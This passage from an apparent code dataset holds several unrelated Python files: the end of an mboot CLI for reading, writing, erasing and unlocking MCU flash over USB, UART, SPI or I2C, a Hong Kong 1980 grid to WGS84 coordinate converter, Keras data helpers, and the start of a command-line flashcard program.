type=type,\n choices=choices,\n required=required,\n help=help,\n metavar=metavar)\n self.check_arg = check_arg\n # print('Initializing CustomAction')\n # for name, value in sorted(locals().items()):\n # if name == 'self' or value is None:\n # continue\n # print('init value: {} = {!r}'.format(name, value))\n # return\n def __call__(self, parser, namespace, values, option_string=None):\n # print('- dest = {}'.format(self.dest))\n # print('- values = {!r}'.format(values))\n # print('- namespace = {}'.format(namespace))\n # print('- parser = {}'.format(parser))\n # print('- option_string = {!r}'.format(option_string))\n # import pprint\n # pprint.pprint('{}'.format(parser.__dict__['_registries']))\n # for item in parser.__dict__['_optionals']:\n # pprint.pprint(item)\n\n #parser.__dict__._StoreAction.dest\n if values:\n '''Normal assignment if the current value exists\n Type conversion will be performed before accon, \n so there is no need to perform type conversion again.'''\n setattr(namespace, self.dest, values)\n else:\n # Get the value of the parameter to check\n check_arg_value = getattr(namespace, self.check_arg, None)\n\n if self.type is None:\n self.type = str\n try:\n # Use the type checker of this parameter to check the value of `check_arg`.\n if isinstance(check_arg_value, (list, tuple)):\n [self.type(value) for value in check_arg_value]\n value = check_arg_value\n else:\n value = self.type(check_arg_value)\n except Exception:\n # Error, give up fix, use default value\n setattr(namespace, self.dest, self.default)\n else:\n # Deprive the value from checked parameters\n setattr(namespace, self.dest, value)\n # Reassign the checked parameter with its default value\n for item in parser.__dict__['_actions']:\n if item.dest == self.check_arg:\n setattr(namespace, self.check_arg, item.default)\n break\n\n@global_error_handler\ndef main():\n parser = argparse.ArgumentParser(prog='mboot', description='A python mboot with user interface.', \n formatter_class=MBootHelpFormatter, add_help=False)#, usage='%(prog)s [peripheral option] [other options] []')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-u', '--usb', nargs='?', const=[], default=None, \n help='Use usb peripheral, such as \"-u VIDPID\", \"-u\"', metavar='vid,pid')\n group.add_argument('-p', '--uart', nargs='*', help='Use uart peripheral, '\n 'such as \"-p PORT SPEED\", \"-p PORT\", \"-p SPEED\", \"-p\"', metavar=('port', 'speed'))\n group.add_argument('-s', '--spi', nargs='*', help='Use spi peripheral, '\n 'such as \"-s VIDPID SPEED\", \"-s VIDPID\", \"-s SPEED\", \"-s\"', metavar=('vid,pid', 'speed'))\n group.add_argument('-i', '--i2c', nargs='*', help='Use i2c peripheral, '\n 'such as \"-i VIDPID SPEED\", \"-i VIDPID\", \"-i SPEED\", \"-i\"', metavar=('vid,pid', 'speed'))\n parser.add_argument('--select_device', help='When inserting two devices with the same vid, pid, '\n 'manually select the device, so that the device selection prompt will not pop up. '\n 'For \"usb\" devices, its value should be the device id under windows, and a pair of values ​​like \"BUS, ADDRESS\" under linux. ')\n parser.add_argument('--ftdi_index', type=check_int, help='When inserting multiple SPI, I2C devices with the same vid, pid,'\n 'its value should be the value of the device path/locate in the order in which they are arranged by the port.')\n\n parser.add_argument('-t', '--timeout', type=int, help='Maximum wait time(Unit: s) for the change of the transceiver status in a single atomic operation, '\n 'it is only valid for the \"flash-erase-*\" command and only changes the timeout of the ack after sending the packet, '\n 'which is invalid for the timeout in read phase.')\n # parser.add_argument('-d', '--debug', action='store_true', help='Debug level: 0-off, 1-info, 2-debug')\n parser.add_argument('-d', '--debug', nargs='?', type=int, choices=range(0, 3), const=1, default=0, help='Debug level: 0-off, 1-info, 2-debug')\n parser.add_argument('-o', '--origin', nargs=argparse.REMAINDER, help='MCU Boot Original Interface')\n parser.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n parser.add_argument('-v', '--version', action='version', version='%(prog)s {}'.format(__version__), help=\"Show program's version number and exit.\")\n # requiredNamed = parser.add_argument_group('required named arguments')\n # requiredNamed.add_argument('-info', action='store_true', help='Get MCU info (mboot properties)')\n\n subparsers = parser.add_subparsers(title='MCU Boot User Interface', prog='mboot [options]')\n \n parser_info = subparsers.add_parser('info', help='Get MCU info (mboot properties)', formatter_class=MBootSubHelpFormatter, add_help=False)\n parser_info.add_argument('memory_id', nargs='?', type=check_int, default=0, choices=(0, 0x1, 0x8, 0x9, 0x0a, 0x010, 0x100, 0x101, 0x110, 0x111, 0x120, 0x121), \n help='External memory id, Display external memory information if it is already executed configure-memory', metavar='memory_id')\n parser_info.add_argument('-e', '--exconf', nargs='*', type=check_int, help='Set external memory address and settings, '\n 'such as \"fill_config_address config_word1 [config_word2 [...]]\", only the first time you need to set')\n parser_info.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n parser_write = subparsers.add_parser('write', help='Write data into MCU memory', formatter_class=MBootSubHelpFormatter, add_help=False)\n parser_write.add_argument('address', type=check_int, nargs='?', help='Start address, '\n 'the arg can be omitted if file end with \".srec\", \".s19\", \".hex\", \".ihex\" that contains the address')\n parser_write.add_argument('filename', help='File to be written')\n parser_write.add_argument('memory_id', nargs='?', type=check_int, default=0, choices=(0, 0x1, 0x8, 0x9, 0x0a, 0x010, 0x100, 0x101, 0x110, 0x111, 0x120, 0x121), \n help='External memory id', metavar='memory_id')\n parser_write.add_argument('-o', '--offset', type=check_int, default=0, help='File offset address')\n parser_write.add_argument('--no_erase', action='store_true', help='Do not automatically erase before writing.')\n parser_write.add_argument('-e', '--exconf', nargs='*', type=check_int, help='Set external memory address and settings, '\n 'such as \"fill_config_address config_word1 [config_word2 [...]]\", only the first time you need to set')\n parser_write.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n parser_read = subparsers.add_parser('read', help='Read data from MCU memory', formatter_class=MBootSubHelpFormatter, add_help=False)\n parser_read.add_argument('address', type=check_int, help='Start address')\n parser_read.add_argument('length', type=check_int, default=0x100, help='Read data length')\n parser_read.add_argument('filename', nargs='?', help='File to be written')\n parser_read.add_argument('memory_id', nargs='?', type=check_int, action=FixArgValue, check_arg='filename', default=0, \n choices=(0, 0x1, 0x8, 0x9, 0x0a, 0x010, 0x100, 0x101, 0x110, 0x111, 0x120, 0x121), help='External memory id', metavar='memory_id')\n parser_read.add_argument('-c', '--compress', action='store_true', help='Compress dump output.')\n parser_read.add_argument('-e', '--exconf', nargs='*', type=check_int, help='Set external memory address and settings, '\n 'such as \"fill_config_address config_word1 [config_word2 [...]]\", only the first time you need to set')\n parser_read.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n parser_fill = subparsers.add_parser('fill', help='Fill MCU memory with specified pattern', formatter_class=MBootSubHelpFormatter, add_help=False)\n parser_fill.add_argument('address', type=check_int, help='Start address')\n parser_fill.add_argument('byte_count', type=check_int, help='Total length of padding, count of bytes')\n parser_fill.add_argument('pattern', type=check_int, help='The pattern used for padding, (default: 0xFFFFFFFF)')\n parser_fill.add_argument('unit', nargs='?', choices=['word', 'short', 'byte'], default='word', \n help='Process pattern according to word, short(half-word), byte')\n parser_fill.add_argument('--no_erase', action='store_true', help='Do not automatically erase before writing.')\n parser_fill.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n parser_erase = subparsers.add_parser('erase', help='Erase MCU memory', formatter_class=MBootSubHelpFormatter, add_help=False)\n parser_erase.add_argument('address', nargs='?', type=check_int, help='Start address')\n parser_erase.add_argument('length', nargs='?', type=check_int, default=0x100, help='Erase data length')\n parser_erase.add_argument('memory_id', nargs='?', type=check_int, default=0, choices=(0, 0x1, 0x8, 0x9, 0x0a, 0x010, 0x100, 0x101, 0x110, 0x111, 0x120, 0x121), \n help='External memory id', metavar='memory_id')\n parser_erase.add_argument('-a', '--all', action='store_true', help='Erase complete MCU memory')\n parser_erase.add_argument('-e', '--exconf', nargs='*', type=check_int, help='Set external memory address and settings, '\n 'such as \"fill_config_address config_word1 [config_word2 [...]]\", only the first time you need to set')\n parser_erase.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n parser_unlock = subparsers.add_parser('unlock', help='Unlock MCU', formatter_class=MBootSubHelpFormatter, add_help=False)\n parser_unlock.add_argument('-k', '--key', type=check_key, help='Use backdoor key as ASCI = S:123...8 or HEX = X:010203...08')\n parser_unlock.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n parser_reset = subparsers.add_parser('reset', help='Reset MCU', formatter_class=MBootSubHelpFormatter, add_help=False)\n parser_reset.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show this help message and exit.')\n\n cmd = parse_args(parser, subparsers)\n log_level = [logging.WARNING, logging.INFO, logging.DEBUG]\n if cmd.origin and cmd.debug < 2:\n cmd.debug += 1\n logging.basicConfig(level=log_level[cmd.debug])\n\n # print(cmd)\n\n mb = mboot.McuBoot()\n mb.cli_mode = True # this is cli mode\n\n # Added the feature to display the original interface help\n if cmd.origin and ('-h' in cmd.origin or '--help' in cmd.origin):\n attr = cmd.origin[0].replace('-', '_')\n func = getattr(mb, attr, None)\n if func:\n print('\\n '.join(line.strip() for line in func.__doc__.split('\\n ')))\n sys.exit(0) # Normal exit\n else:\n raise McuBootGenericError('invalid command:{}'.format(cmd.origin[0]))\n\n if cmd.usb is not None:\n if cmd.select_device:\n vid_pid = parse_peripheral(Interface.USB.name, cmd.usb, not cmd.select_device)[0]\n mb.open_usb(vid_pid, cmd.select_device)\n else:\n config = parse_peripheral(Interface.USB.name, cmd.usb)[0]\n mb.open_usb(config[0:2], config[-1])\n # device = RawHID.enumerate(*vid_pid)[0]\n # mb.open_usb(device)\n elif cmd.uart is not None:\n port, baudrate = parse_peripheral(Interface.UART.name, cmd.uart)\n mb.open_uart(port, baudrate)\n elif cmd.spi is not None:\n if cmd.ftdi_index:\n vid_pid, speed = parse_peripheral(Interface.SPI.name, cmd.spi, False)\n mb.open_spi(vid_pid, cmd.ftdi_index, speed, 0)\n else:\n config, speed = parse_peripheral(Interface.SPI.name, cmd.spi)\n vid_pid = config[0:2]\n index = config[-1]\n mb.open_spi(vid_pid, index, freq=speed, mode=0)\n elif cmd.i2c is not None:\n if cmd.ftdi_index:\n vid_pid, speed = parse_peripheral(Interface.I2C.name, cmd.i2c, False)\n mb.open_i2c(vid_pid, cmd.ftdi_index, speed)\n else:\n config, speed = parse_peripheral(Interface.I2C.name, cmd.i2c)\n vid_pid = config[0:2]\n index = config[-1]\n mb.open_i2c(vid_pid, index, freq=speed)\n else:\n raise McuBootGenericError('You need to choose a peripheral for communication.')\n\n # mb.get_memory_range()\n\n if cmd.info:\n args = cmd.info\n if getattr(args, '_unrecognized_args', None):\n raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n info(mb, args.memory_id, args.exconf)\n\n if cmd.write:\n args = cmd.write\n if getattr(args, '_unrecognized_args', None):\n raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n write(mb, args.address, args.filename, args.memory_id, args.offset, args.no_erase, args.exconf)\n print(\" Write Successfully.\")\n\n if cmd.read:\n args = cmd.read\n if getattr(args, '_unrecognized_args', None):\n raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n read(mb, args.address, args.length, args.filename, args.memory_id, args.compress, args.exconf)\n\n if cmd.fill:\n args = cmd.fill\n if getattr(args, '_unrecognized_args', None):\n raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n fill(mb, args.address, args.byte_count, args.pattern, args.unit, args.no_erase)\n print(\" Fill Successfully.\")\n\n if cmd.erase:\n args = cmd.erase\n if getattr(args, '_unrecognized_args', None):\n raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n if args.address is None and not args.all:\n raise McuBootGenericError('If you do not use the full-chip erase mode, you must enter the erase address.')\n erase(mb, args.address, args.length, args.memory_id, args.all, args.exconf)\n print(\" Erase Successfully.\")\n\n if cmd.unlock:\n args = cmd.unlock\n if getattr(args, '_unrecognized_args', None):\n raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n unlock(mb, args.key)\n print(\" Unlock Successfully.\")\n\n if cmd.reset:\n args = cmd.reset\n if getattr(args, '_unrecognized_args', None):\n raise McuBootGenericError('invalid arguments:{}'.format(args._unrecognized_args))\n mb.reset()\n print(' Reset Successfully.')\n\n if cmd.origin:\n mb.timeout = cmd.timeout or mb.timeout\n attr = cmd.origin[0].replace('-', '_')\n func = getattr(mb, attr, None)\n\n if func:\n cmd_args = cmd.origin[1:]\n # if cmd_args[0].lower().startswith('-h'): # cmd_args[0].lower() == '-h' or cmd_args[0].lower() == '--help':\n # print('\\n '.join(line.strip() for line in func.__doc__.split('\\n ')))\n if check_method_arg_number(func, len(cmd_args)):\n if attr == 'flash_security_disable':\n args = cmd_args\n else:\n args = convert_arg_to_int(cmd_args)\n data = func(*args)\n if attr == 'read_memory':\n print('\\n', hexdump(data, args[0], False))\n else:\n raise McuBootGenericError('invalid arguments:{}'.format(cmd_args))\n else:\n raise McuBootGenericError('invalid command:{}'.format(cmd.origin[0]))\n\n mb.close()\n","sub_path":"mboot/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":31382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"654013445","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 31 21:50:47 2016\n\n@author: KITMAN\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.optimize import fsolve\n\n#================================#\n# Fixed constants\n#================================#\n\nfix_parms = {'a': 6378388, \n 'f': 1 / 297,\n 'e_sq': 2 / 297 - (1 / 297)**2,\n 'm0': 1,\n 'E0': 836694.05,\n 'N0': 819069.80,\n 'lambda0': (114 + 10 / 60 + 42.80 / 3600) / 180 * np.pi,\n 'phi0': (22 + 18 / 60 + 43.68 / 3600) / 180 * np.pi}\n\n\n\n\n#================================#\n# Projection parameters\n#================================#\n\ndef get_proj_parms(phi = (22 + 18 / 60 + 43.68 / 3600) / 180 * np.pi): \n a = fix_parms[\"a\"]\n e_sq = fix_parms[\"e_sq\"]\n upsilon = a / (1 - e_sq * np.sin(phi)**2)**(1 / 2)\n rho = a * (1 - e_sq) / (1 - e_sq * np.sin(phi)**2)**(3 / 2)\n psi = upsilon / rho\n # Note that the values of rho and psi are different from the note,\n # where upsilon = 6381480.500, rho = 6359840.760, psi = 1.003402560.\n # This issue has been reported to the Geodetic Survey Section, Lands Department, Hong Kong\n # and it is under investigation.\n out = {'upsilon': upsilon,\n 'rho': rho,\n 'psi': psi}\n return out\n\n\n\n\n#================================#\n# Meridian distance\n#================================#\n\ndef meridian_dist(phi, a = fix_parms[\"a\"], e_sq = fix_parms[\"e_sq\"]):\n # Constants\n A0 = 1 - e_sq / 4 - 3 * e_sq**2 / 64\n A2 = 3 / 8 * (e_sq + e_sq**2 / 4)\n A4 = 15 / 256 * e_sq**2\n mdist = a * (A0 * phi - A2 * np.sin(2 * phi) + A4 * np.sin(4 * phi))\n return mdist\n\n\n\n\n#================================#\n# Transformation function\n# Conversion between \n# 1. HK80G: HK 1980 Grid Coordinates, \n# 2. HK80: HK 1980 Geodetic Coordinates\n# 3. WGS84: WGS84 Latitude and Longitude (ITRF96)\n# lng and lat are expressed in degree by default\n#================================#\n\n## HK80G to HK80\ndef hk80g_to_hk80(E, N, unit = \"d\"):\n # Get all necessary parameters\n lambda0 = fix_parms[\"lambda0\"]\n phi0 = fix_parms[\"phi0\"]\n E0 = fix_parms[\"E0\"]\n N0 = fix_parms[\"N0\"]\n m0 = fix_parms[\"m0\"]\n M0 = meridian_dist(phi = phi0) # M0 = 2468395.723\n f = lambda phi: (meridian_dist(phi) - (N - N0 + M0) / m0) # Find phi_p using eqt3 in Note\n phi_p = np.asscalar(fsolve(f, 0))\n proj_parms = get_proj_parms(phi_p)\n upsilon = proj_parms[\"upsilon\"]\n rho = proj_parms[\"rho\"]\n psi = proj_parms[\"psi\"]\n # Obtain lng and lat in HK80\n lng = lambda0 + 1 / np.cos(phi_p) * (E - E0) / (m0 * upsilon) - 1 / np.cos(phi_p) * (E - E0)**3 / (6 * m0**3 * upsilon**3) * (psi + 2 * np.tan(phi_p)**2)\n lat = phi_p - np.tan(phi_p) / (m0 * rho) * (E - E0)**2 / (2 * m0 * upsilon)\n if (unit == \"d\"):\n lng = lng * 180 / np.pi\n lat = lat * 180 / np.pi\n # Output\n out = pd.Series({'lng': lng, 'lat': lat})[[\"lng\", \"lat\"]]\n return out\n\n\ndef hk80_to_hk80g(lng, lat, unit = \"d\"):\n if (unit == \"d\"):\n lng = lng * np.pi / 180\n lat = lat * np.pi / 180\n lambda0 = fix_parms[\"lambda0\"]\n phi0 = fix_parms[\"phi0\"]\n E0 = fix_parms[\"E0\"]\n N0 = fix_parms[\"N0\"]\n m0 = fix_parms[\"m0\"]\n M0 = meridian_dist(phi0) # M0 = 2468395.723\n M = meridian_dist(lat)\n proj_parms = get_proj_parms()\n upsilon = proj_parms[\"upsilon\"]\n psi = proj_parms[\"psi\"]\n # Obtaint E, N coordinates\n E = E0 + m0 * (upsilon * (lng - lambda0) * np.cos(lat) + upsilon * (lng - lambda0)**3 / 6 * (np.cos(lat))**3 * (psi - (np.tan(lat))**2))\n N = N0 + m0 * ((M - M0 + upsilon * np.sin(lat) * (lng - lambda0)**2 / 2 * np.cos(lat)))\n # Output\n out = pd.Series({'E': E, 'N': N})[[\"E\", \"N\"]]\n return out\n\n\n\n\n## WGS84 <-> HK80\ndef wgs84_to_hk80(lng, lat, unit = \"d\"):\n if (unit == \"r\"):\n lng = lng - 8.8 / 60**2 * np.pi / 180\n lat = lat + 5.5 / 60**2 * np.pi / 180\n elif (unit == \"d\"):\n lng = lng - 8.8 / 60**2\n lat = lat + 5.5 / 60**2\n # Output\n out = pd.Series({'lng': lng, 'lat': lat})[[\"lng\", \"lat\"]]\n return out\n\n\ndef hk80_to_to_wgs84(lng, lat, unit = \"d\"):\n if (unit == \"r\"):\n lng = lng + 8.8 / 60**2 * np.pi / 180\n lat = lat - 5.5 / 60**2 * np.pi / 180\n elif (unit == \"d\"):\n lng = lng + 8.8 / 60**2\n lat = lat - 5.5 / 60**2\n # Output\n out = pd.Series({'lng': lng, 'lat': lat})[[\"lng\", \"lat\"]]\n return out\n\n\n\n\n## WGS84 <-> HK80G (Through HK80)\ndef wgs84_to_hk80g(lng, lat, unit = \"d\"):\n hk80_coords = wgs84_to_hk80(lng = lng, lat = lat, unit = unit)\n out = hk80_to_hk80g(lng = hk80_coords[\"lng\"], lat = hk80_coords[\"lat\"], unit = unit)\n return out\n\n\ndef hk80g_to_to_wgs84(E, N, unit = \"d\"):\n hk80_coords = hk80g_to_hk80(E = E, N = N, unit = unit)\n out = hk80_to_to_wgs84(lng = hk80_coords[\"lng\"], lat = hk80_coords[\"lat\"], unit = unit)\n return out\n\n\n\n\n#================================#\n# Class Coordinates\n# x: Longitude/Easting, y: Latitude/Northing\n#================================#\nclass Coordinates(object):\n def __init__(self, x, y, datum):\n self.datum = datum.lower()\n \n try:\n try:\n xy = pd.DataFrame({'x': x, 'y': y})\n except:\n xy = pd.DataFrame({'x': [x], 'y': [y]})\n \n self.xy = xy\n except:\n None\n #warnings.warn(\"Invalid input 'x' and 'y'!\")\n \n \n def to_wgs84(self):\n datum = self.datum\n new_xy = self.xy.copy()\n if datum == \"wgs84\":\n new_xy = new_xy\n elif datum == \"hk80\":\n tran = lambda df: hk80_to_to_wgs84(df[\"x\"], df[\"y\"])\n new_xy = new_xy.apply(tran, axis = 1)\n elif datum == \"hk80g\":\n tran = lambda df: hk80g_to_to_wgs84(df[\"x\"], df[\"y\"])\n new_xy = new_xy.apply(tran, axis = 1)\n else:\n return None\n new_xy.columns = [\"Longitude\", \"Latitude\"]\n return new_xy\n \n \n def to_hk80(self):\n datum = self.datum\n new_xy = self.xy.copy()\n if datum == \"wgs84\":\n tran = lambda df: wgs84_to_hk80(df[\"x\"], df[\"y\"])\n new_xy = new_xy.apply(tran, axis = 1)\n elif datum == \"hk80\":\n new_xy = new_xy\n elif datum == \"hk80g\":\n tran = lambda df: hk80g_to_hk80(df[\"x\"], df[\"y\"])\n new_xy = new_xy.apply(tran, axis = 1)\n else:\n return None\n new_xy.columns = [\"Longitude\", \"Latitude\"]\n return new_xy\n \n \n def to_hk80g(self):\n datum = self.datum\n new_xy = self.xy.copy()\n if datum == \"wgs84\":\n tran = lambda df: wgs84_to_hk80g(df[\"x\"], df[\"y\"])\n new_xy = new_xy.apply(tran, axis = 1)\n elif datum == \"hk80\":\n tran = lambda df: hk80_to_hk80g(df[\"x\"], df[\"y\"])\n new_xy = new_xy.apply(tran, axis = 1)\n elif datum == \"hk80g\":\n new_xy = new_xy\n else:\n return None\n new_xy.columns = [\"Easting\", \"Northing\"]\n return new_xy\n \n\n\n\n#================================#\n#Example\n#================================#\n#coords = Coordinates([836055, 832591.320], [832699, 820351.389], \"hk80g\")\n#coords.to_wgs84()\n#coords.to_hk80()\n#coords.to_hk80g()\n#\n#coords = [[836055, 832699], [832591.320, 820351.389]]\n#coords_df = pd.DataFrame(coords, columns = [\"E\", \"N\"])\n#\n#hk80g_to_hk80(836055, 832699)\n#hk80_to_hk80g(114+10/60+20.46/3600, 22+26/60+6.76/3600)\n#wgs84_to_hk80g(114.141187917, 22.322172084)\n#coords_df.apply(lambda x: hk80g_to_wgs84(x[\"E\"], x[\"N\"]), axis = 1)\n#================================#\n\n\n\n\n#================================#\n#Reference\n#================================#\n#https://www.geodetic.gov.hk/smo/gsi/data/pdf/explanatorynotes.pdf\n#https://www.geodetic.gov.hk/smo/gsi/data/pdf/explanatorynotes_c.pdf # (Traditional Chinese version)\n#https://www.geodetic.gov.hk/smo/gsi/data/parameter/SchematicDiagram.pdf\n#https://www.geodetic.gov.hk/smo/tform/tform.aspx\n#https://www.geodetic.gov.hk/smo/en/tform/tform.aspx\n#http://www.hydro.gov.hk/eng/datumnew.php\n#http://cs2cs.mygeodata.eu/\n#https://en.wikipedia.org/wiki/World_Geodetic_System\n#http://ailin.phychembio.com/miscellany/1387/\n#http://blog.tiger-workshop.com/hk1980-grid-to-wgs84/\n#================================#\n","sub_path":"Py/geodeticHK.py","file_name":"geodeticHK.py","file_ext":"py","file_size_in_byte":8350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"70473311","text":"import keras\nimport pandas as pd\nimport numpy as np\nfrom string import ascii_lowercase as alphabet\nfrom keras.utils import to_categorical\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import model_from_json\n\n\n\n\n#Load data \ndef loadData(dir):\n\tdata = pd.DataFrame(pd.read_csv(str(dir) + '.csv')).as_matrix()\n\tprint(\"Data Loaded\")\n\treturn(data)\n\ndef setupDictionary():\n\tOHs = to_categorical(np.arange(len(alphabet)))\n\tdictionary = {c:OH for c,OH in zip(alphabet,OHs)}\n\trev_dictionary = {i:c for i,c in enumerate(alphabet)}\n\treturn dictionary, rev_dictionary\n\ndef dataToWords(data):\n\twordsY = []\n\twordsX = []\n\twordY = ''\n\twordX = []\n\tix = 0\n\tmax_ix = data.shape[0]\n\twhile ix < max_ix:\n\t\tif data[ix,2] == -1:\n\t\t\twordY+=data[ix,1]\n\t\t\twordX.append(data[ix,4:].reshape(16,8,1))\n\t\t\twordsY.append(wordY)\n\t\t\twordsX.append(np.asarray(wordX))\n\t\t\twordY = ''\n\t\t\twordX = []\n\t\telse:\n\t\t\twordY+=data[ix,1]\n\t\t\twordX.append(data[ix,4:].reshape(16,8,1))\n\t\tix+=1\n\twordsX = np.asarray(wordsX)\n\twordsY = np.array(wordsY)\n\treturn wordsX,wordsY\n\n\ndef seqData(seq_length,wordsX, wordsY, dictionary, test = False):\n\t#max_len = np.max([len(word) for word in wordsY])\n\tdataX = []\n\tdataY = []\n\tfor word_idx in range(wordsX.shape[0]):\n\t\tfor i in range(0, wordsX[word_idx].shape[0]- seq_length +1, 1):\n\t\t\tseq_in = wordsX[word_idx][i:i + seq_length]\n\t\t\tseq_out = wordsY[word_idx][i:i + seq_length]\n\t\t\tdataX.append(seq_in)\n\t\t\tdataY.append(seq_out)\n\tdataX = np.asarray(dataX)\n\tX_seq = pad_sequences(dataX, maxlen = seq_length, dtype = 'float32')\n\tY_seq = np.array([np.array([dictionary[c] for c in w]) for w in dataY])\n\tY_seq = pad_sequences(Y_seq, maxlen = seq_length, dtype = 'float32')\n\tY_seq = np.reshape(Y_seq, (len(Y_seq), seq_length,Y_seq.shape[2]))\n\tX_seq = np.reshape(X_seq, (len(X_seq), seq_length,X_seq.shape[2],X_seq.shape[3],X_seq.shape[4]))\n\treturn X_seq,Y_seq\n\ndef len_indexes(words, length):\n\tlen_index = []\n\tfor i in range(len(words)):\n\t\tif len(words[i]) == length:\n\t\t\tlen_index.append(i)\n\treturn np.array(len_index)\n\ndef save_model(model, Net, version = 1, l = 0):\n\t# serialize model to JSON\n\tmodel_json = model.to_json()\n\twith open(\"model_\"+ Net +\"v\"+ str(version) + \"_\"+ str(l) + \".json\", \"w\") as json_file:\n\t json_file.write(model_json)\n\t# serialize weights to HDF5\n\tmodel.save_weights(\"model_\"+ Net +\"v\"+ str(version) + \"_\"+str(l)+\".h5\")\n\tprint(\"Saved model to disk: \" + \"model_\"+ Net +\"v\"+ str(version) + \"_\"+ str(l))\n\ndef load_model(Net, version = 0, l = 0):\n\t# load json and create model\n\tjson_file = open(\"model_\"+ Net +\"v\"+ str(version) + \"_\"+ str(l) + \".json\", 'r')\n\tloaded_model_json = json_file.read()\n\tjson_file.close()\n\tloaded_model = model_from_json(loaded_model_json)\n\t# load weights into new model\n\tloaded_model.load_weights(\"model_\"+ Net +\"v\"+ str(version) + \"_\"+str(l)+\".h5\")\n\tprint(\"Loaded model from disk: \" + \"model\"+ Net +\"v\"+ str(version) + \"_\"+str(l))\n\treturn loaded_model\n\n\n","sub_path":"HelperFunctions.py","file_name":"HelperFunctions.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"547092245","text":"# LTAT.03.001 - Introduction to Computer Programming @ Tartu Univesity - Project\n# 11/2018\n# This file implements the program functionality on command line.\n\nimport flashcardclasses as fc\ndeck_arr = [] # list of decks to be loaded in\n\n####################################################\n\ndef load_data(filename = \"data.txt\", arr = deck_arr):\n # in: str, list\n # out: None\n # Loads the data from filename.\n file = open(filename, mode=\"r\", encoding=\"UTF-8\")\n data_iter = 0 # card data iterator\n data_list = [] # card data itself\n \n for line in file:\n if line[0] == '\\t': # if flashcard data...\n data_iter += 1\n line = line.strip()\n if data_iter != 0: # subpar\n if data_iter < 3: # first two - strings\n data_list.append(line)\n elif data_iter < 4: # ease\n data_list.append(float(line))\n elif data_iter < 5: # streak\n data_list.append(int(line))\n elif data_iter == 5: # due\n data_list.append(fc.dt.datetime.fromtimestamp(float(line)))\n # adding cards to latest deck...\n arr[-1].load_card(fc.Flashcard(data_list[0],data_list[1],data_list[2],data_list[3],data_list[4]))\n data_list = [] # reset data list and iterator for new data\n data_iter = 0\n else: # if not data, add new deck to list.\n arr.append(fc.Deck(line))\n file.close()\n \ndef save_data(filename = \"data.txt\", arr = deck_arr):\n # in: str, list\n # out: None\n # Saves the current state decks and cards into filename.\n file = open(filename, mode=\"w\", encoding=\"UTF-8\")\n for deck in deck_arr:\n file.write(deck.get_title() + '\\n')\n for card in deck:\n data = card.get_all_data()\n data[-1] = data[-1].timestamp() # unix timestamp\n for elem in data:\n file.write('\\t' + str(elem) + '\\n') \n file.close()\n\ndef print_all_cards(reload = 0, arr = deck_arr):\n # in: int, list\n # prints all cards we have loaded\n if reload: # if reload is true, we'll load data in again.\n load_data()\n for deck in arr:\n print(\"Deck name: \" + deck.get_title())\n for card in deck:\n print('\\t' + str(card))\n\n####################################################\n# Try to load the data.\ntry:\n load_data()\nexcept FileNotFoundError:\n save_data() # creates file should it not exist\n\n####################################################\n# Command line interface.\ndef main_screen():\n opt = {0: \"q\", 1: decks_screen, 2: study_screen}\n txt = [\"Quit\", \"Decks\", \"Study\"]\n\n for i in range(len(opt)):\n print(\"{}: {}\".format(str(i), txt[i]))\n\n n = int(input(\"Option: \"))\n return opt[n]\n\ndef decks_screen(arr = deck_arr):\n opt = {0:\"q\", 1: main_screen, 2: new_deck, 3: delete_deck, 4: edit_deck}\n txt = [\"Quit\", \"Home\", \"New deck\", \"Delete deck\", \"Edit deck\"]\n\n print(\"Your decks are currently as follows: \")\n for i in range(len(arr)):\n print(\"{}: {}, due: {}\".format(str(i), arr[i].get_title(), arr[i].count_due()))\n \n for i in range(len(opt)):\n print(\"{}: {}\".format(str(i), txt[i]))\n n = int(input(\"Option: \"))\n return opt[n]\n\ndef new_deck(arr = deck_arr):\n title = input(\"Enter a title for your new deck: \")\n arr.append(fc.Deck(title))\n return decks_screen\n\ndef delete_deck(arr = deck_arr):\n n = int(input(\"Enter the number of the deck you wish to delete: \"))\n del arr[n]\n return decks_screen\n\ndef edit_deck(arr = deck_arr):\n def new_card(deck):\n front = input(\"Enter front side of card: \")\n back = input(\"Enter back side of card: \")\n deck.add_card(front, back)\n def delete_card(deck):\n n = int(input(\"Enter the number of the card you wish to delete: \"))\n deck.remove_card_i(deck, n)\n def edit_card(deck):\n n = int(input(\"Enter the number of the card you wish to edit: \"))\n print(\"Current card data: {}\".format(deck.get_card(n)))\n\n active_card = deck.get_card(n)\n\n change_front_choice = input(\"Do you wish to change the front of the card? y/n: \")\n while change_front_choice.lower() != \"y\" and change_front_choice.lower() != \"n\":\n change_front_choice = input(\"Invalid input. Change the front of the card? y/n: \")\n if change_front_choice.lower() == \"y\":\n new_front = input(\"Enter the new front side of the card: \")\n active_card.set_front(new_front)\n\n change_back_choice = input(\"Do you wish to change the back of the card? y/n: \")\n while change_back_choice.lower() != \"y\" and change_back_choice.lower() != \"n\":\n change_back_choice = 